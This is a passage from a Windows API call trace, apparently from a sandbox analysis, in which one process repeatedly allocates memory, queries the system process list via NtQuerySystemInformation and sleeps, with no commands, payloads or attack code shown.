Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.788] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.804] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.850] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.865] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.881] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.915] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.926] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.944] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.960] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.974] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.998] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.005] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.023] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.037] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.053] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.070] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.083] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.099] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.123] 